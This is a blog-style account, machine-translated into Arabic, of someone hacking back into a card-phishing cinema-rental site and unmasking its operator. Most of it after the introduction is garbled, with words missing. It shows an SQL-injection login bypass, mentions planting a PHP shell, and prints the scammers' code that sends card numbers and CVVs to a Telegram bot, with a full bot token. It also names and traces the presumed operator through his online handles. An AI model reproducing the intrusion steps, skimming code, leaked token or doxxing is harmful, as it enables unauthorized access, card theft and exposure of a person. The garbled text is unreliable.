ملخص
يمكن أن يصبح كل منا ضحية لمهاجم ، ولكن في بعض الأحيان تتغير أماكن المفترس والفريسة.
هذه قصة قصيرة حول كيف يمكن أن يؤدي الاستخدام غير الكفء للتكنولوجيا إلى الكشف عن الشخصية. ستكون المقالة مفيدة لكل من المتسللين الشباب الذين يرغبون في الحصول على "أموال سهلة" ولمن يريدون الإمساك بهم.
مقدمة
في إحدى أمسيات فبراير ، كنت مشغولة بالبحث عن مكان لتاريخ رومانسي مع حبيبي. بعد مرور بعض الوقت ، تم لفت انتباهي إلى موقع
milleniumfilm.ru ، والذي لا يتوفر حاليًا. يوفر الموقع خدمات تأجير صالات السينما الصغيرة للمشاهدة الخاصة. هناك صور جميلة وأسعار معقولة ، وهناك دعم عبر الإنترنت ، ولكن هناك شيء واحد: تم اقتراح إدخال بيانات البطاقة المصرفية في صفحة غير محمية في نفس المجال. حذرًا ، كتبت إلى الدعم الفني للموقع ، ولم يستغرق المخادعون وقتًا طويلًا في الانتظار - مدركين أنني مؤهل تقنيًا بما يكفي أرسلوا لي 3 رسائل. بالطبع ، لا يعقل المخادعون إهدار الوقت عليّ ، لكن لماذا وقح جدًا؟ - في أي حالة ، تحتاج إلى أن تبقى رجل.
يمكنك العثور على مراجعات حول مواقع نفس الخطة هنا:
zhaloba-online.ru . البعض منهم لا يزال حتى العمل.
كسر
الشعور بالظلم الشامل ، من أجل إثبات هوية المهاجم وقمع أنشطته ، بدأت في دراسة الموقع بحثًا عن نقاط الضعف.
بالإشارة بإصبع في السماء ، قادني العنوان الأول الذي أدخلته إلى
لوحة المشرف التي طلبت مني بأدب الإشارة إلى "تسجيل الدخول" و "كلمة المرور".
أول محاولة في حقن SQL أول كلمة مرور تتبادر إلى الذهن
1' or '1
.
., .
Gelloiss.ru . « » — : , , , cvc2 .
., 3D-secure, . , . , 3D-secure . , , .
« » - . , php-shell.
/images/,
login.php. , .
telegram.php.
.$ cat telegram.php
<?
function send_mess($text) {
$token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";
$mess = $text;
$chat = "-302359340";
/*return "<iframe style='width:500px; height:500px;' src='https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess."'></iframe>";*/
file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);
}
PHP - send_mess. , - , .
grep./cart.php:22:send_mess(" : ".$name."%0D%0AEmail: ".$email."%0D%0A: ".$phone."%0D%0A : ".$date."%0D%0A".": ".$time."%0D%0A: ".$city."%0D%0A: ".$sum."%0D%0A : ".$services."%0D%0AIP: ".$ip."%0D%0A: ".$link_ban_ip);
./pay/ms.php:21: send_mess(": ".$sum."%0D%0A : ".$name."%0D%0A : ".$num."%0D%0A , : ".$month."%0D%0A: ".$year."%0D%0Acvv: ".$cvv);
, -, chat_id, skype «ura7887» telegram «Gelloiss» ( telegram , telegram-
).
, , .
curl$ curl "https://api.telegram.org/bot626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs/getChatAdministrators?chat_id=-302359340"
{"ok":true,"result":[{"user":{"id":365019332,"is_bot":false,"first_name":"Iskr\u00e1","username":"Gelloiss","language_code":"ru"},"status":"creator"}]}
username — «gelloiss».
: ! : «gelloiss», «ura7887»,
, «Gelloiss.ru», skype «ura7887».
:
vk.com , 6 , 14 .
anime.anidub.com.
blackhacker.ru, .
telegram
,
Gelloiss.ru telegram, telegram- . , telegram- .
shell$ sha256sum <<< "i'm carder yuri iskra."
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 -
telegram :
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 .
, . , 100 , +100.
, «». « »
.
, . : 3 - 13 . , - , 2 . , , . ,
moneyonline.world.
Update 2019-04-21:
gelloiss , , , telegram:
Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message=' « » ', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\n ?)) \n ', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ‒ , . , , . , .', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | , , ', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),